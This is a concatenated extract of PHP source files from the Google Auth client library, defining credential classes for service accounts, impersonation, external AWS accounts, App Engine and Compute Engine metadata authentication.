string $securityCredentialsUrl * @param array $headers Request headers to send in with the request. * @return array{string, string, ?string} */ public static function getSigningVarsFromUrl( callable $httpHandler, string $securityCredentialsUrl, string $roleName, array $headers ): array { // Get the AWS credentials $credsRequest = new Request( 'GET', $securityCredentialsUrl . '/' . $roleName, $headers ); $credsResponse = $httpHandler($credsRequest); $awsCreds = json_decode((string) $credsResponse->getBody(), true); return [ $awsCreds['AccessKeyId'], // accessKeyId $awsCreds['SecretAccessKey'], // secretAccessKey $awsCreds['Token'], // token ]; } /** * @internal * * @return array{string, string, ?string} */ public static function getSigningVarsFromEnv(): ?array { $accessKeyId = getenv('AWS_ACCESS_KEY_ID'); $secretAccessKey = getenv('AWS_SECRET_ACCESS_KEY'); if ($accessKeyId && $secretAccessKey) { return [ $accessKeyId, $secretAccessKey, getenv('AWS_SESSION_TOKEN') ?: null, // session token (can be null) ]; } return null; } /** * Return HMAC hash in binary string */ private static function hmacSign(string $key, string $msg): string { return hash_hmac('sha256', self::utf8Encode($msg), $key, true); } /** * @TODO add a fallback when mbstring is not available */ private static function utf8Encode(string $string): string { return mb_convert_encoding($string, 'UTF-8', 'ISO-8859-1'); } private static function getSignatureKey( string $key, string $dateStamp, string $regionName, string $serviceName ): string { $kDate = self::hmacSign(self::utf8Encode('AWS4' . $key), $dateStamp); $kRegion = self::hmacSign($kDate, $regionName); $kService = self::hmacSign($kRegion, $serviceName); $kSigning = self::hmacSign($kService, 'aws4_request'); return $kSigning; } } google-api/vendor/google/auth/src/Credentials/InsecureCredentials.php000064400000003457147600400120021774 0ustar00 '' ]; /** * Fetches the auth token. In this case it returns an empty string. * * @param callable $httpHandler * @return array{access_token:string} A set of auth related metadata */ public function fetchAuthToken(callable $httpHandler = null) { return $this->token; } /** * Returns the cache key. In this case it returns a null value, disabling * caching. * * @return string|null */ public function getCacheKey() { return null; } /** * Fetches the last received token. In this case, it returns the same empty string * auth token. * * @return array{access_token:string} */ public function getLastReceivedToken() { return $this->token; } } google-api/vendor/google/auth/src/Credentials/ImpersonatedServiceAccountCredentials.php000064400000010702147600400120025476 0ustar00 $jsonKey JSON credential file path or JSON credentials * as an associative array. */ public function __construct( $scope, $jsonKey ) { if (is_string($jsonKey)) { if (!file_exists($jsonKey)) { throw new \InvalidArgumentException('file does not exist'); } $json = file_get_contents($jsonKey); if (!$jsonKey = json_decode((string) $json, true)) { throw new \LogicException('invalid json for auth config'); } } if (!array_key_exists('service_account_impersonation_url', $jsonKey)) { throw new \LogicException( 'json key is missing the service_account_impersonation_url field' ); } if (!array_key_exists('source_credentials', $jsonKey)) { throw new \LogicException('json key is missing the source_credentials field'); } $this->impersonatedServiceAccountName = $this->getImpersonatedServiceAccountNameFromUrl( $jsonKey['service_account_impersonation_url'] ); $this->sourceCredentials = new UserRefreshCredentials( $scope, $jsonKey['source_credentials'] ); } /** * Helper function for extracting the Server Account Name from the URL saved in the account * credentials file. * * @param $serviceAccountImpersonationUrl string URL from "service_account_impersonation_url" * @return string Service account email or ID. */ private function getImpersonatedServiceAccountNameFromUrl( string $serviceAccountImpersonationUrl ): string { $fields = explode('/', $serviceAccountImpersonationUrl); $lastField = end($fields); $splitter = explode(':', $lastField); return $splitter[0]; } /** * Get the client name from the keyfile * * In this implementation, it will return the issuers email from the oauth token. * * @param callable|null $unusedHttpHandler not used by this credentials type. * @return string Token issuer email */ public function getClientName(callable $unusedHttpHandler = null) { return $this->impersonatedServiceAccountName; } /** * @param callable $httpHandler * * @return array { * A set of auth related metadata, containing the following * * @type string $access_token * @type int $expires_in * @type string $scope * @type string $token_type * @type string $id_token * } */ public function fetchAuthToken(callable $httpHandler = null) { return $this->sourceCredentials->fetchAuthToken($httpHandler); } /** * @return string */ public function getCacheKey() { return $this->sourceCredentials->getCacheKey(); } /** * @return array */ public function getLastReceivedToken() { return $this->sourceCredentials->getLastReceivedToken(); } } google-api/vendor/google/auth/src/Credentials/ServiceAccountCredentials.php000064400000027271147600400120023134 0ustar00push($middleware); * * $client = new Client([ * 'handler' => $stack, * 'base_uri' => 'https://www.googleapis.com/taskqueue/v1beta2/projects/', * 'auth' => 'google_auth' // authorize all requests * ]); * * $res = $client->get('myproject/taskqueues/myqueue'); */ class ServiceAccountCredentials extends CredentialsLoader implements GetQuotaProjectInterface, SignBlobInterface, ProjectIdProviderInterface { use ServiceAccountSignerTrait; /** * The OAuth2 instance used to conduct authorization. * * @var OAuth2 */ protected $auth; /** * The quota project associated with the JSON credentials * * @var string */ protected $quotaProject; /** * @var string|null */ protected $projectId; /** * @var array|null */ private $lastReceivedJwtAccessToken; /** * @var bool */ private $useJwtAccessWithScope = false; /** * @var ServiceAccountJwtAccessCredentials|null */ private $jwtAccessCredentials; /** * @var string */ private string $universeDomain; /** * Create a new ServiceAccountCredentials. * * @param string|string[]|null $scope the scope of the access request, expressed * either as an Array or as a space-delimited String. * @param string|array $jsonKey JSON credential file path or JSON credentials * as an associative array * @param string $sub an email address account to impersonate, in situations when * the service account has been delegated domain wide access. * @param string $targetAudience The audience for the ID token. */ public function __construct( $scope, $jsonKey, $sub = null, $targetAudience = null ) { if (is_string($jsonKey)) { if (!file_exists($jsonKey)) { throw new \InvalidArgumentException('file does not exist'); } $jsonKeyStream = file_get_contents($jsonKey); if (!$jsonKey = json_decode((string) $jsonKeyStream, true)) { throw new \LogicException('invalid json for auth config'); } } if (!array_key_exists('client_email', $jsonKey)) { throw new \InvalidArgumentException( 'json key is missing the client_email field' ); } if (!array_key_exists('private_key', $jsonKey)) { throw new \InvalidArgumentException( 'json key is missing the private_key field' ); } if (array_key_exists('quota_project_id', $jsonKey)) { $this->quotaProject = (string) $jsonKey['quota_project_id']; } if ($scope && $targetAudience) { throw new InvalidArgumentException( 'Scope and targetAudience cannot both be supplied' ); } $additionalClaims = []; if ($targetAudience) { $additionalClaims = ['target_audience' => $targetAudience]; } $this->auth = new OAuth2([ 'audience' => self::TOKEN_CREDENTIAL_URI, 'issuer' => $jsonKey['client_email'], 'scope' => $scope, 'signingAlgorithm' => 'RS256', 'signingKey' => $jsonKey['private_key'], 'sub' => $sub, 'tokenCredentialUri' => self::TOKEN_CREDENTIAL_URI, 'additionalClaims' => $additionalClaims, ]); $this->projectId = $jsonKey['project_id'] ?? null; $this->universeDomain = $jsonKey['universe_domain'] ?? self::DEFAULT_UNIVERSE_DOMAIN; } /** * When called, the ServiceAccountCredentials will use an instance of * ServiceAccountJwtAccessCredentials to fetch (self-sign) an access token * even when only scopes are supplied. Otherwise, * ServiceAccountJwtAccessCredentials is only called when no scopes and an * authUrl (audience) is suppled. * * @return void */ public function useJwtAccessWithScope() { $this->useJwtAccessWithScope = true; } /** * @param callable $httpHandler * * @return array { * A set of auth related metadata, containing the following * * @type string $access_token * @type int $expires_in * @type string $token_type * } */ public function fetchAuthToken(callable $httpHandler = null) { if ($this->useSelfSignedJwt()) { $jwtCreds = $this->createJwtAccessCredentials(); $accessToken = $jwtCreds->fetchAuthToken($httpHandler); if ($lastReceivedToken = $jwtCreds->getLastReceivedToken()) { // Keep self-signed JWTs in memory as the last received token $this->lastReceivedJwtAccessToken = $lastReceivedToken; } return $accessToken; } return $this->auth->fetchAuthToken($httpHandler); } /** * @return string */ public function getCacheKey() { $key = $this->auth->getIssuer() . ':' . $this->auth->getCacheKey(); if ($sub = $this->auth->getSub()) { $key .= ':' . $sub; } return $key; } /** * @return array */ public function getLastReceivedToken() { // If self-signed JWTs are being used, fetch the last received token // from memory. Else, fetch it from OAuth2 return $this->useSelfSignedJwt() ? $this->lastReceivedJwtAccessToken : $this->auth->getLastReceivedToken(); } /** * Get the project ID from the service account keyfile. * * Returns null if the project ID does not exist in the keyfile. * * @param callable $httpHandler Not used by this credentials type. * @return string|null */ public function getProjectId(callable $httpHandler = null) { return $this->projectId; } /** * Updates metadata with the authorization token. * * @param array $metadata metadata hashmap * @param string $authUri optional auth uri * @param callable $httpHandler callback which delivers psr7 request * @return array updated metadata hashmap */ public function updateMetadata( $metadata, $authUri = null, callable $httpHandler = null ) { // scope exists. use oauth implementation if (!$this->useSelfSignedJwt()) { return parent::updateMetadata($metadata, $authUri, $httpHandler); } $jwtCreds = $this->createJwtAccessCredentials(); if ($this->auth->getScope()) { // Prefer user-provided "scope" to "audience" $updatedMetadata = $jwtCreds->updateMetadata($metadata, null, $httpHandler); } else { $updatedMetadata = $jwtCreds->updateMetadata($metadata, $authUri, $httpHandler); } if ($lastReceivedToken = $jwtCreds->getLastReceivedToken()) { // Keep self-signed JWTs in memory as the last received token $this->lastReceivedJwtAccessToken = $lastReceivedToken; } return $updatedMetadata; } /** * @return ServiceAccountJwtAccessCredentials */ private function createJwtAccessCredentials() { if (!$this->jwtAccessCredentials) { // Create credentials for self-signing a JWT (JwtAccess) $credJson = [ 'private_key' => $this->auth->getSigningKey(), 'client_email' => $this->auth->getIssuer(), ]; $this->jwtAccessCredentials = new ServiceAccountJwtAccessCredentials( $credJson, $this->auth->getScope() ); } return $this->jwtAccessCredentials; } /** * @param string $sub an email address account to impersonate, in situations when * the service account has been delegated domain wide access. * @return void */ public function setSub($sub) { $this->auth->setSub($sub); } /** * Get the client name from the keyfile. * * In this case, it returns the keyfile's client_email key. * * @param callable $httpHandler Not used by this credentials type. * @return string */ public function getClientName(callable $httpHandler = null) { return $this->auth->getIssuer(); } /** * Get the quota project used for this API request * * @return string|null */ public function getQuotaProject() { return $this->quotaProject; } /** * Get the universe domain configured in the JSON credential. * * @return string */ public function getUniverseDomain(): string { return $this->universeDomain; } /** * @return bool */ private function useSelfSignedJwt() { // When a sub is supplied, the user is using domain-wide delegation, which not available // with self-signed JWTs if (null !== $this->auth->getSub()) { // If we are outside the GDU, we can't use domain-wide delegation if ($this->getUniverseDomain() !== self::DEFAULT_UNIVERSE_DOMAIN) { throw new \LogicException(sprintf( 'Service Account subject is configured for the credential. Domain-wide ' . 'delegation is not supported in universes other than %s.', self::DEFAULT_UNIVERSE_DOMAIN )); } return false; } // If claims are set, this call is for "id_tokens" if ($this->auth->getAdditionalClaims()) { return false; } // When true, ServiceAccountCredentials will always use JwtAccess for access tokens if ($this->useJwtAccessWithScope) { return true; } // If the universe domain is outside the GDU, use JwtAccess for access tokens if ($this->getUniverseDomain() !== self::DEFAULT_UNIVERSE_DOMAIN) { return true; } return is_null($this->auth->getScope()); } } google-api/vendor/google/auth/src/Credentials/IAMCredentials.php000064400000004707147600400120020624 0ustar00selector = $selector; $this->token = $token; } /** * export a callback function which updates runtime metadata. * * @return callable updateMetadata function */ public function getUpdateMetadataFunc() { return [$this, 'updateMetadata']; } /** * Updates metadata with the appropriate header metadata. * * @param array $metadata metadata hashmap * @param string $unusedAuthUri optional auth uri * @param callable $httpHandler callback which delivers psr7 request * Note: this param is unused here, only included here for * consistency with other credentials class * * @return array updated metadata hashmap */ public function updateMetadata( $metadata, $unusedAuthUri = null, callable $httpHandler = null ) { $metadata_copy = $metadata; $metadata_copy[self::SELECTOR_KEY] = $this->selector; $metadata_copy[self::TOKEN_KEY] = $this->token; return $metadata_copy; } } google-api/vendor/google/auth/src/Credentials/ExternalAccountCredentials.php000064400000020661147600400120023312 0ustar00 $jsonKey JSON credentials as an associative array. */ public function __construct( $scope, array $jsonKey ) { if (!array_key_exists('type', $jsonKey)) { throw new InvalidArgumentException('json key is missing the type field'); } if ($jsonKey['type'] !== self::EXTERNAL_ACCOUNT_TYPE) { throw new InvalidArgumentException(sprintf( 'expected "%s" type but received "%s"', self::EXTERNAL_ACCOUNT_TYPE, $jsonKey['type'] )); } if (!array_key_exists('token_url', $jsonKey)) { throw new InvalidArgumentException( 'json key is missing the token_url field' ); } if (!array_key_exists('audience', $jsonKey)) { throw new InvalidArgumentException( 'json key is missing the audience field' ); } if (!array_key_exists('subject_token_type', $jsonKey)) { throw new InvalidArgumentException( 'json key is missing the subject_token_type field' ); } if (!array_key_exists('credential_source', $jsonKey)) { throw new InvalidArgumentException( 'json key is missing the credential_source field' ); } if (array_key_exists('service_account_impersonation_url', $jsonKey)) { $this->serviceAccountImpersonationUrl = $jsonKey['service_account_impersonation_url']; } $this->quotaProject = $jsonKey['quota_project_id'] ?? null; $this->auth = new OAuth2([ 'tokenCredentialUri' => $jsonKey['token_url'], 'audience' => $jsonKey['audience'], 'scope' => $scope, 'subjectTokenType' => $jsonKey['subject_token_type'], 'subjectTokenFetcher' => self::buildCredentialSource($jsonKey), ]); } /** * @param array $jsonKey */ private static function buildCredentialSource(array $jsonKey): ExternalAccountCredentialSourceInterface { $credentialSource = $jsonKey['credential_source']; if (isset($credentialSource['file'])) { return new FileSource( $credentialSource['file'], $credentialSource['format']['type'] ?? null, $credentialSource['format']['subject_token_field_name'] ?? null ); } if ( isset($credentialSource['environment_id']) && 1 === preg_match('/^aws(\d+)$/', $credentialSource['environment_id'], $matches) ) { if ($matches[1] !== '1') { throw new InvalidArgumentException( "aws version \"$matches[1]\" is not supported in the current build." ); } if (!array_key_exists('regional_cred_verification_url', $credentialSource)) { throw new InvalidArgumentException( 'The regional_cred_verification_url field is required for aws1 credential source.' ); } if (!array_key_exists('audience', $jsonKey)) { throw new InvalidArgumentException( 'aws1 credential source requires an audience to be set in the JSON file.' ); } return new AwsNativeSource( $jsonKey['audience'], $credentialSource['regional_cred_verification_url'], // $regionalCredVerificationUrl $credentialSource['region_url'] ?? null, // $regionUrl $credentialSource['url'] ?? null, // $securityCredentialsUrl $credentialSource['imdsv2_session_token_url'] ?? null, // $imdsV2TokenUrl ); } if (isset($credentialSource['url'])) { return new UrlSource( $credentialSource['url'], $credentialSource['format']['type'] ?? null, $credentialSource['format']['subject_token_field_name'] ?? null, $credentialSource['headers'] ?? null, ); } throw new InvalidArgumentException('Unable to determine credential source from json key.'); } /** * @param string $stsToken * @param callable $httpHandler * * @return array { * A set of auth related metadata, containing the following * * @type string $access_token * @type int $expires_at * } */ private function getImpersonatedAccessToken(string $stsToken, callable $httpHandler = null): array { if (!isset($this->serviceAccountImpersonationUrl)) { throw new InvalidArgumentException( 'service_account_impersonation_url must be set in JSON credentials.' ); } $request = new Request( 'POST', $this->serviceAccountImpersonationUrl, [ 'Content-Type' => 'application/json', 'Authorization' => 'Bearer ' . $stsToken, ], (string) json_encode([ 'lifetime' => sprintf('%ss', OAuth2::DEFAULT_EXPIRY_SECONDS), 'scope' => $this->auth->getScope(), ]), ); if (is_null($httpHandler)) { $httpHandler = HttpHandlerFactory::build(HttpClientCache::getHttpClient()); } $response = $httpHandler($request); $body = json_decode((string) $response->getBody(), true); return [ 'access_token' => $body['accessToken'], 'expires_at' => strtotime($body['expireTime']), ]; } /** * @param callable $httpHandler * * @return array { * A set of auth related metadata, containing the following * * @type string $access_token * @type int $expires_at (impersonated service accounts only) * @type int $expires_in (identity pool only) * @type string $issued_token_type (identity pool only) * @type string $token_type (identity pool only) * } */ public function fetchAuthToken(callable $httpHandler = null) { $stsToken = $this->auth->fetchAuthToken($httpHandler); if (isset($this->serviceAccountImpersonationUrl)) { return $this->getImpersonatedAccessToken($stsToken['access_token'], $httpHandler); } return $stsToken; } public function getCacheKey() { return $this->auth->getCacheKey(); } public function getLastReceivedToken() { return $this->auth->getLastReceivedToken(); } /** * Get the quota project used for this API request * * @return string|null */ public function getQuotaProject() { return $this->quotaProject; } } google-api/vendor/google/auth/src/Credentials/ServiceAccountJwtAccessCredentials.php000064400000014044147600400120024735 0ustar00 $jsonKey JSON credential file path or JSON credentials * as an associative array * @param string|string[] $scope the scope of the access request, expressed * either as an Array or as a space-delimited String. */ public function __construct($jsonKey, $scope = null) { if (is_string($jsonKey)) { if (!file_exists($jsonKey)) { throw new \InvalidArgumentException('file does not exist'); } $jsonKeyStream = file_get_contents($jsonKey); if (!$jsonKey = json_decode((string) $jsonKeyStream, true)) { throw new \LogicException('invalid json for auth config'); } } if (!array_key_exists('client_email', $jsonKey)) { throw new \InvalidArgumentException( 'json key is missing the client_email field' ); } if (!array_key_exists('private_key', $jsonKey)) { throw new \InvalidArgumentException( 'json key is missing the private_key field' ); } if (array_key_exists('quota_project_id', $jsonKey)) { $this->quotaProject = (string) $jsonKey['quota_project_id']; } $this->auth = new OAuth2([ 'issuer' => $jsonKey['client_email'], 'sub' => $jsonKey['client_email'], 'signingAlgorithm' => 'RS256', 'signingKey' => $jsonKey['private_key'], 'scope' => $scope, ]); $this->projectId = $jsonKey['project_id'] ?? null; } /** * Updates metadata with the authorization token. * * @param array $metadata metadata hashmap * @param string $authUri optional auth uri * @param callable $httpHandler callback which delivers psr7 request * @return array updated metadata hashmap */ public function updateMetadata( $metadata, $authUri = null, callable $httpHandler = null ) { $scope = $this->auth->getScope(); if (empty($authUri) && empty($scope)) { return $metadata; } $this->auth->setAudience($authUri); return parent::updateMetadata($metadata, $authUri, $httpHandler); } /** * Implements FetchAuthTokenInterface#fetchAuthToken. * * @param callable $httpHandler * * @return null|array{access_token:string} A set of auth related metadata */ public function fetchAuthToken(callable $httpHandler = null) { $audience = $this->auth->getAudience(); $scope = $this->auth->getScope(); if (empty($audience) && empty($scope)) { return null; } if (!empty($audience) && !empty($scope)) { throw new \UnexpectedValueException( 'Cannot sign both audience and scope in JwtAccess' ); } $access_token = $this->auth->toJwt(); // Set the self-signed access token in OAuth2 for getLastReceivedToken $this->auth->setAccessToken($access_token); return ['access_token' => $access_token]; } /** * @return string */ public function getCacheKey() { return $this->auth->getCacheKey(); } /** * @return array */ public function getLastReceivedToken() { return $this->auth->getLastReceivedToken(); } /** * Get the project ID from the service account keyfile. * * Returns null if the project ID does not exist in the keyfile. * * @param callable $httpHandler Not used by this credentials type. * @return string|null */ public function getProjectId(callable $httpHandler = null) { return $this->projectId; } /** * Get the client name from the keyfile. * * In this case, it returns the keyfile's client_email key. * * @param callable $httpHandler Not used by this credentials type. * @return string */ public function getClientName(callable $httpHandler = null) { return $this->auth->getIssuer(); } /** * Get the quota project used for this API request * * @return string|null */ public function getQuotaProject() { return $this->quotaProject; } } google-api/vendor/google/auth/src/Credentials/AppIdentityCredentials.php000064400000015562147600400120022451 0ustar00push($middleware); * * $client = new Client([ * 'handler' => $stack, * 'base_uri' => 'https://www.googleapis.com/books/v1', * 'auth' => 'google_auth' * ]); * * $res = $client->get('volumes?q=Henry+David+Thoreau&country=US'); * ``` */ class AppIdentityCredentials extends CredentialsLoader implements SignBlobInterface, ProjectIdProviderInterface { /** * Result of fetchAuthToken. * * @var array */ protected $lastReceivedToken; /** * Array of OAuth2 scopes to be requested. * * @var string[] */ private $scope; /** * @var string */ private $clientName; /** * @param string|string[] $scope One or more scopes. */ public function __construct($scope = []) { $this->scope = is_array($scope) ? $scope : explode(' ', (string) $scope); } /** * Determines if this an App Engine instance, by accessing the * SERVER_SOFTWARE environment variable (prod) or the APPENGINE_RUNTIME * environment variable (dev). * * @return bool true if this an App Engine Instance, false otherwise */ public static function onAppEngine() { $appEngineProduction = isset($_SERVER['SERVER_SOFTWARE']) && 0 === strpos($_SERVER['SERVER_SOFTWARE'], 'Google App Engine'); if ($appEngineProduction) { return true; } $appEngineDevAppServer = isset($_SERVER['APPENGINE_RUNTIME']) && $_SERVER['APPENGINE_RUNTIME'] == 'php'; if ($appEngineDevAppServer) { return true; } return false; } /** * Implements FetchAuthTokenInterface#fetchAuthToken. * * Fetches the auth tokens using the AppIdentityService if available. * As the AppIdentityService uses protobufs to fetch the access token, * the GuzzleHttp\ClientInterface instance passed in will not be used. * * @param callable $httpHandler callback which delivers psr7 request * @return array { * A set of auth related metadata, containing the following * * @type string $access_token * @type string $expiration_time * } */ public function fetchAuthToken(callable $httpHandler = null) { try { $this->checkAppEngineContext(); } catch (\Exception $e) { return []; } /** @phpstan-ignore-next-line */ $token = AppIdentityService::getAccessToken($this->scope); $this->lastReceivedToken = $token; return $token; } /** * Sign a string using AppIdentityService. * * @param string $stringToSign The string to sign. * @param bool $forceOpenSsl [optional] Does not apply to this credentials * type. * @return string The signature, base64-encoded. * @throws \Exception If AppEngine SDK or mock is not available. */ public function signBlob($stringToSign, $forceOpenSsl = false) { $this->checkAppEngineContext(); /** @phpstan-ignore-next-line */ return base64_encode(AppIdentityService::signForApp($stringToSign)['signature']); } /** * Get the project ID from AppIdentityService. * * Returns null if AppIdentityService is unavailable. * * @param callable $httpHandler Not used by this type. * @return string|null */ public function getProjectId(callable $httpHandler = null) { try { $this->checkAppEngineContext(); } catch (\Exception $e) { return null; } /** @phpstan-ignore-next-line */ return AppIdentityService::getApplicationId(); } /** * Get the client name from AppIdentityService. * * Subsequent calls to this method will return a cached value. * * @param callable $httpHandler Not used in this implementation. * @return string * @throws \Exception If AppEngine SDK or mock is not available. */ public function getClientName(callable $httpHandler = null) { $this->checkAppEngineContext(); if (!$this->clientName) { /** @phpstan-ignore-next-line */ $this->clientName = AppIdentityService::getServiceAccountName(); } return $this->clientName; } /** * @return array{access_token:string,expires_at:int}|null */ public function getLastReceivedToken() { if ($this->lastReceivedToken) { return [ 'access_token' => $this->lastReceivedToken['access_token'], 'expires_at' => $this->lastReceivedToken['expiration_time'], ]; } return null; } /** * Caching is handled by the underlying AppIdentityService, return empty string * to prevent caching. * * @return string */ public function getCacheKey() { return ''; } /** * @return void */ private function checkAppEngineContext() { if (!self::onAppEngine() || !class_exists('google\appengine\api\app_identity\AppIdentityService')) { throw new \Exception( 'This class must be run in App Engine, or you must include the AppIdentityService ' . 'mock class defined in tests/mocks/AppIdentityService.php' ); } } } google-api/vendor/google/auth/src/Credentials/GCECredentials.php000064400000044405147600400120020613 0ustar00push($middleware); * * $client = new Client([ * 'handler' => $stack, * 'base_uri' => 'https://www.googleapis.com/taskqueue/v1beta2/projects/', * 'auth' => 'google_auth' * ]); * * $res = $client->get('myproject/taskqueues/myqueue'); */ class GCECredentials extends CredentialsLoader implements SignBlobInterface, ProjectIdProviderInterface, GetQuotaProjectInterface { use IamSignerTrait; // phpcs:disable const cacheKey = 'GOOGLE_AUTH_PHP_GCE'; // phpcs:enable /** * The metadata IP address on appengine instances. * * The IP is used instead of the domain 'metadata' to avoid slow responses * when not on Compute Engine. */ const METADATA_IP = ''; /** * The metadata path of the default token. */ const TOKEN_URI_PATH = 'v1/instance/service-accounts/default/token'; /** * The metadata path of the default id token. */ const ID_TOKEN_URI_PATH = 'v1/instance/service-accounts/default/identity'; /** * The metadata path of the client ID. */ const CLIENT_ID_URI_PATH = 'v1/instance/service-accounts/default/email'; /** * The metadata path of the project ID. */ const PROJECT_ID_URI_PATH = 'v1/project/project-id'; /** * The metadata path of the project ID. */ const UNIVERSE_DOMAIN_URI_PATH = 'v1/universe/universe_domain'; /** * The header whose presence indicates GCE presence. */ const FLAVOR_HEADER = 'Metadata-Flavor'; /** * The Linux file which contains the product name. */ private const GKE_PRODUCT_NAME_FILE = '/sys/class/dmi/id/product_name'; /** * Note: the explicit `timeout` and `tries` below is a workaround. The underlying * issue is that resolving an unknown host on some networks will take * 20-30 seconds; making this timeout short fixes the issue, but * could lead to false negatives in the event that we are on GCE, but * the metadata resolution was particularly slow. The latter case is * "unlikely" since the expected 4-nines time is about 0.5 seconds. * This allows us to limit the total ping maximum timeout to 1.5 seconds * for developer desktop scenarios. */ const MAX_COMPUTE_PING_TRIES = 3; const COMPUTE_PING_CONNECTION_TIMEOUT_S = 0.5; /** * Flag used to ensure that the onGCE test is only done once;. * * @var bool */ private $hasCheckedOnGce = false; /** * Flag that stores the value of the onGCE check. * * @var bool */ private $isOnGce = false; /** * Result of fetchAuthToken. * * @var array */ protected $lastReceivedToken; /** * @var string|null */ private $clientName; /** * @var string|null */ private $projectId; /** * @var string */ private $tokenUri; /** * @var string */ private $targetAudience; /** * @var string|null */ private $quotaProject; /** * @var string|null */ private $serviceAccountIdentity; /** * @var string */ private ?string $universeDomain; /** * @param Iam $iam [optional] An IAM instance. * @param string|string[] $scope [optional] the scope of the access request, * expressed either as an array or as a space-delimited string. * @param string $targetAudience [optional] The audience for the ID token. * @param string $quotaProject [optional] Specifies a project to bill for access * charges associated with the request. * @param string $serviceAccountIdentity [optional] Specify a service * account identity name to use instead of "default". * @param string $universeDomain [optional] Specify a universe domain to use * instead of fetching one from the metadata server. */ public function __construct( Iam $iam = null, $scope = null, $targetAudience = null, $quotaProject = null, $serviceAccountIdentity = null, string $universeDomain = null ) { $this->iam = $iam; if ($scope && $targetAudience) { throw new InvalidArgumentException( 'Scope and targetAudience cannot both be supplied' ); } $tokenUri = self::getTokenUri($serviceAccountIdentity); if ($scope) { if (is_string($scope)) { $scope = explode(' ', $scope); } $scope = implode(',', $scope); $tokenUri = $tokenUri . '?scopes=' . $scope; } elseif ($targetAudience) { $tokenUri = self::getIdTokenUri($serviceAccountIdentity); $tokenUri = $tokenUri . '?audience=' . $targetAudience; $this->targetAudience = $targetAudience; } $this->tokenUri = $tokenUri; $this->quotaProject = $quotaProject; $this->serviceAccountIdentity = $serviceAccountIdentity; $this->universeDomain = $universeDomain; } /** * The full uri for accessing the default token. * * @param string $serviceAccountIdentity [optional] Specify a service * account identity name to use instead of "default". * @return string */ public static function getTokenUri($serviceAccountIdentity = null) { $base = 'http://' . self::METADATA_IP . '/computeMetadata/'; $base .= self::TOKEN_URI_PATH; if ($serviceAccountIdentity) { return str_replace( '/default/', '/' . $serviceAccountIdentity . '/', $base ); } return $base; } /** * The full uri for accessing the default service account. * * @param string $serviceAccountIdentity [optional] Specify a service * account identity name to use instead of "default". * @return string */ public static function getClientNameUri($serviceAccountIdentity = null) { $base = 'http://' . self::METADATA_IP . '/computeMetadata/'; $base .= self::CLIENT_ID_URI_PATH; if ($serviceAccountIdentity) { return str_replace( '/default/', '/' . $serviceAccountIdentity . '/', $base ); } return $base; } /** * The full uri for accesesing the default identity token. * * @param string $serviceAccountIdentity [optional] Specify a service * account identity name to use instead of "default". * @return string */ private static function getIdTokenUri($serviceAccountIdentity = null) { $base = 'http://' . self::METADATA_IP . '/computeMetadata/'; $base .= self::ID_TOKEN_URI_PATH; if ($serviceAccountIdentity) { return str_replace( '/default/', '/' . $serviceAccountIdentity . '/', $base ); } return $base; } /** * The full uri for accessing the default project ID. * * @return string */ private static function getProjectIdUri() { $base = 'http://' . self::METADATA_IP . '/computeMetadata/'; return $base . self::PROJECT_ID_URI_PATH; } /** * The full uri for accessing the default universe domain. * * @return string */ private static function getUniverseDomainUri() { $base = 'http://' . self::METADATA_IP . '/computeMetadata/'; return $base . self::UNIVERSE_DOMAIN_URI_PATH; } /** * Determines if this an App Engine Flexible instance, by accessing the * GAE_INSTANCE environment variable. * * @return bool true if this an App Engine Flexible Instance, false otherwise */ public static function onAppEngineFlexible() { return substr((string) getenv('GAE_INSTANCE'), 0, 4) === 'aef-'; } /** * Determines if this a GCE instance, by accessing the expected metadata * host. * If $httpHandler is not specified a the default HttpHandler is used. * * @param callable $httpHandler callback which delivers psr7 request * @return bool True if this a GCEInstance, false otherwise */ public static function onGce(callable $httpHandler = null) { $httpHandler = $httpHandler ?: HttpHandlerFactory::build(HttpClientCache::getHttpClient()); $checkUri = 'http://' . self::METADATA_IP; for ($i = 1; $i <= self::MAX_COMPUTE_PING_TRIES; $i++) { try { // Comment from: oauth2client/client.py // // Note: the explicit `timeout` below is a workaround. The underlying // issue is that resolving an unknown host on some networks will take // 20-30 seconds; making this timeout short fixes the issue, but // could lead to false negatives in the event that we are on GCE, but // the metadata resolution was particularly slow. The latter case is // "unlikely". $resp = $httpHandler( new Request( 'GET', $checkUri, [self::FLAVOR_HEADER => 'Google'] ), ['timeout' => self::COMPUTE_PING_CONNECTION_TIMEOUT_S] ); return $resp->getHeaderLine(self::FLAVOR_HEADER) == 'Google'; } catch (ClientException $e) { } catch (ServerException $e) { } catch (RequestException $e) { } catch (ConnectException $e) { } } if (PHP_OS === 'Windows') { // @TODO: implement GCE residency detection on Windows return false; } // Detect GCE residency on Linux return self::detectResidencyLinux(self::GKE_PRODUCT_NAME_FILE); } private static function detectResidencyLinux(string $productNameFile): bool { if (file_exists($productNameFile)) { $productName = trim((string) file_get_contents($productNameFile)); return 0 === strpos($productName, 'Google'); } return false; } /** * Implements FetchAuthTokenInterface#fetchAuthToken. * * Fetches the auth tokens from the GCE metadata host if it is available. * If $httpHandler is not specified a the default HttpHandler is used. * * @param callable $httpHandler callback which delivers psr7 request * * @return array { * A set of auth related metadata, based on the token type. * * @type string $access_token for access tokens * @type int $expires_in for access tokens * @type string $token_type for access tokens * @type string $id_token for ID tokens * } * @throws \Exception */ public function fetchAuthToken(callable $httpHandler = null) { $httpHandler = $httpHandler ?: HttpHandlerFactory::build(HttpClientCache::getHttpClient()); if (!$this->hasCheckedOnGce) { $this->isOnGce = self::onGce($httpHandler); $this->hasCheckedOnGce = true; } if (!$this->isOnGce) { return []; // return an empty array with no access token } $response = $this->getFromMetadata($httpHandler, $this->tokenUri); if ($this->targetAudience) { return $this->lastReceivedToken = ['id_token' => $response]; } if (null === $json = json_decode($response, true)) { throw new \Exception('Invalid JSON response'); } $json['expires_at'] = time() + $json['expires_in']; // store this so we can retrieve it later $this->lastReceivedToken = $json; return $json; } /** * @return string */ public function getCacheKey() { return self::cacheKey; } /** * @return array|null */ public function getLastReceivedToken() { if ($this->lastReceivedToken) { if (array_key_exists('id_token', $this->lastReceivedToken)) { return $this->lastReceivedToken; } return [ 'access_token' => $this->lastReceivedToken['access_token'], 'expires_at' => $this->lastReceivedToken['expires_at'] ]; } return null; } /** * Get the client name from GCE metadata. * * Subsequent calls will return a cached value. * * @param callable $httpHandler callback which delivers psr7 request * @return string */ public function getClientName(callable $httpHandler = null) { if ($this->clientName) { return $this->clientName; } $httpHandler = $httpHandler ?: HttpHandlerFactory::build(HttpClientCache::getHttpClient()); if (!$this->hasCheckedOnGce) { $this->isOnGce = self::onGce($httpHandler); $this->hasCheckedOnGce = true; } if 